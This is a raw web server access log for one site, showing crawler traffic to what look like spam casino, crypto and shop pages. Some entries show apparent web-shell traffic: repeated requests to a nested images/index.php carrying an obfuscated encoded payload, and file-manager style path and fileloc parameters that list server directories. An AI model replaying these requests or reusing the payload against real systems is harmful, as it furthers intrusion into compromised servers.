66.249.73.162 - - [01/May/2026:12:52:42 +0300] "GET /?detail/629814339 HTTP/1.1" 200 28829 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:12:52:45 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Ftwentytwentythree%2Fparts%2Fcomments.html&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Ftwentytwentythree%2Fparts HTTP/2" 200 2903 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:12:52:45 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Ftest%2Fphp HTTP/2" 200 5714 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:12:50:47 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633323634372p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393034372q6339323463313738373161333634353430626530656630613930366438363238222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
85.208.96.198 - - [01/May/2026:12:52:58 +0300] "GET /discover-the-power-of-bscscan-for-crypto-trading/ HTTP/1.1" 200 10410 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.73.162 - - [01/May/2026:12:52:58 +0300] "GET /?detail/919585254 HTTP/1.1" 200 28794 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:12:51:09 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633323636392p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393036392q3937373831363162613935333636653963643032346464396361316238366130222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [01/May/2026:12:53:14 +0300] "GET /?prizes/79619545 HTTP/1.1" 200 29673 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:12:53:20 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Fbower_components%2Frequirejs HTTP/2" 200 3301 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:12:53:20 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Ftest%2Fapacheasp HTTP/2" 200 5702 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.162 - - [01/May/2026:12:53:28 +0300] "GET /?prizes/179169777 HTTP/1.1" 200 29158 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:12:51:31 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633323639312p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393039312q3637353434306232326431306435376130643433326565393162646139363563222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
51.89.129.202 - - [01/May/2026:12:53:38 +0300] "GET /detail/369079466 HTTP/2" 200 8255 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.216.113.70 - - [01/May/2026:12:51:53 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633323731332p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393131332q3634393735353937373364353132363930366437326238663036353963316561222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
198.244.226.53 - - [01/May/2026:12:54:05 +0300] "GET /detail/329191710 HTTP/2" 200 8257 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.81 - - [01/May/2026:12:54:06 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Fassets%2Fcss HTTP/2" 200 3378 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:12:54:06 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Ftwentytwentythree%2Fparts%2Fpost-meta.html&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Ftwentytwentythree%2Fparts HTTP/2" 200 2903 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.164 - - [01/May/2026:12:54:07 +0300] "GET /shop/joltingly/warence282462375064.html HTTP/1.1" 200 30305 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.78.1 - - [01/May/2026:12:54:09 +0300] "GET /?detail/555987668 HTTP/1.1" 200 29736 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:12:52:15 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633323733352p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393133352q3163303338666565653331303735306638366431643939646638666663393438222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [01/May/2026:12:54:16 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Ftest%2Ffcgi HTTP/2" 200 5962 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:12:54:16 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Ftest%2Fcgi HTTP/2" 200 5516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.163 - - [01/May/2026:12:54:20 +0300] "GET /?detail/994776574 HTTP/1.1" 200 31505 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [01/May/2026:12:54:25 +0300] "GET /?detail/559938203 HTTP/1.1" 200 29641 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.195.183.63 - - [01/May/2026:12:54:33 +0300] "GET /detail/366911118 HTTP/2" 200 8246 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [01/May/2026:12:54:33 +0300] "GET /shop/hasped/corbie36546526338.html HTTP/1.1" 200 28380 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:12:52:37 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633323735372p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393135372q6534393033393234666531326233313032333932333336336536633337636531222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
85.208.96.212 - - [01/May/2026:12:54:40 +0300] "GET /discover-the-benefits-of-using-ledger-live-for-crypto/ HTTP/1.1" 200 10409 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.217.81 - - [01/May/2026:12:54:43 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Fassets%2Fjs HTTP/2" 200 3621 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:12:54:43 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Ftest%2Fperl HTTP/2" 200 5705 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.162 - - [01/May/2026:12:54:50 +0300] "GET /shop/oaring/collectivized502141135409.html HTTP/1.1" 200 28920 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; GoogleOther)"
198.244.168.78 - - [01/May/2026:12:54:59 +0300] "GET /detail/889935559 HTTP/2" 200 8263 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.216.113.70 - - [01/May/2026:12:52:59 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633323737392p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393137392q6437653131316138653334383362346264346666363934646435366434303935222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
185.216.113.70 - - [01/May/2026:12:53:21 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633323830312p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393230312q6438363266333363376539303563656461316432386136326130306565646332222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
130.51.22.201 - - [01/May/2026:12:55:21 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/ HTTP/1.1" 200 8723 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0"
66.249.73.164 - - [01/May/2026:12:55:20 +0300] "GET /shop/espousement/mumpishness863588302782.html HTTP/1.1" 200 30335 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.3 - - [01/May/2026:12:55:23 +0300] "GET /shop/cinerea/matronalis36880652044.html HTTP/1.1" 200 29639 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; GoogleOther)"
198.244.226.75 - - [01/May/2026:12:55:26 +0300] "GET /index.php?shop/zeuglodon/procurement053992903971.html HTTP/2" 200 8245 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.163 - - [01/May/2026:12:55:27 +0300] "GET /?prizes/110998949 HTTP/1.1" 200 29827 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.1 - - [01/May/2026:12:55:31 +0300] "GET /shop/diglyph/outstanding05196336251.html HTTP/1.1" 200 29021 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [01/May/2026:12:55:33 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Fassets%2Fsass HTTP/2" 200 3434 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:12:55:33 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Ftwentytwentythree%2Fparts%2Ffooter.html&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Ftwentytwentythree%2Fparts HTTP/2" 200 2902 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
85.208.96.207 - - [01/May/2026:12:55:38 +0300] "GET /a-comprehensive-overview-of-sushiswap-for-traders-2/ HTTP/1.1" 200 10389 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.217.81 - - [01/May/2026:12:55:39 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Ftest%2Fcoldfusion HTTP/2" 200 5724 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:12:53:43 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633323832332p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393232332q6561376264353563373564663138666666316531316165363632643861653261222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [01/May/2026:12:55:45 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Fbower_components%2Falmond HTTP/2" 200 3287 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.162 - - [01/May/2026:12:55:44 +0300] "GET /?detail/347328706 HTTP/1.1" 200 28767 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.1 - - [01/May/2026:12:55:48 +0300] "GET /shop/overraking/callisthenics503866962848.html HTTP/1.1" 200 28035 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; GoogleOther)"
51.195.183.44 - - [01/May/2026:12:55:54 +0300] "GET /index.php?shop/wolfishness/tetrandria031102898230.html HTTP/2" 200 8244 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.163 - - [01/May/2026:12:56:02 +0300] "GET /?detail/194814788 HTTP/1.1" 200 29716 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:12:54:05 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633323834352p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393234352q3461323038626664353737643333633265306232396665643865363933653762222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.78.2 - - [01/May/2026:12:56:07 +0300] "GET /shop/mythologer/fashioned61719586077.html HTTP/1.1" 200 29874 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [01/May/2026:12:56:19 +0300] "GET /shop/boydekin/chaussure572390646837.html HTTP/1.1" 200 28589 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.89.129.119 - - [01/May/2026:12:56:22 +0300] "GET /index.php?shop/weeper/crocus041172560543.html HTTP/2" 200 8258 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.216.113.70 - - [01/May/2026:12:54:27 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633323836372p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393236372q3934656435356130613762626662373130356238633231346366653535303565222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [01/May/2026:12:56:38 +0300] "GET /?detail/903706637 HTTP/1.1" 200 29876 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.195.244.45 - - [01/May/2026:12:56:49 +0300] "GET /index.php?shop/unshrubbed/selfenclosed02884904701.html HTTP/2" 200 8254 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.216.113.70 - - [01/May/2026:12:54:49 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633323838392p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393238392q3330313564323131633337363162333931353963373563343337323732646264222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [01/May/2026:12:57:05 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Ftest%2Fssi HTTP/2" 200 5694 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [01/May/2026:12:57:10 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fblogs%2Fmedia HTTP/2" 200 5494 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:12:55:11 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633323931312p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393331312q3835343232386239386663303130613036313437663736373965396639386535222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.78.2 - - [01/May/2026:12:57:11 +0300] "GET /?detail/105248856 HTTP/1.1" 200 29895 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.89.129.6 - - [01/May/2026:12:57:16 +0300] "GET /index.php?shop/semiangle/paranymph033761272686.html HTTP/2" 200 8233 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.81 - - [01/May/2026:12:57:16 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Ftest%2Fmiva HTTP/2" 200 5717 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [01/May/2026:12:55:33 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633323933332p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393333332q6432626232383338353461643230386230376631383233356134643736656361222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
198.244.183.211 - - [01/May/2026:12:57:42 +0300] "GET /index.php?shop/selfsatisfying/plantation042289965292.html HTTP/2" 200 8264 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [01/May/2026:12:57:45 +0300] "GET /?detail/272248421 HTTP/1.1" 200 28880 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [01/May/2026:12:57:47 +0300] "GET /shop/presenting/arbitral693284222163.html HTTP/1.1" 200 28117 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:12:55:55 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373633323935352p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632393335352q6361313937363364316139353833343836343633636330666434366462346533222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [01/May/2026:12:57:56 +0300] "GET /?prizes/115003505 HTTP/1.1" 200 30504 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [01/May/2026:12:58:02 +0300] "GET /shop/washhouse/tschego03606118835.html HTTP/1.1" 200 29621 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; GoogleOther)"
51.195.244.82 - - [01/May/2026:12:58:08 +0300] "GET /index.php?shop/rhythmically/circumferentially023322262358.html HTTP/2" 200 8242 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
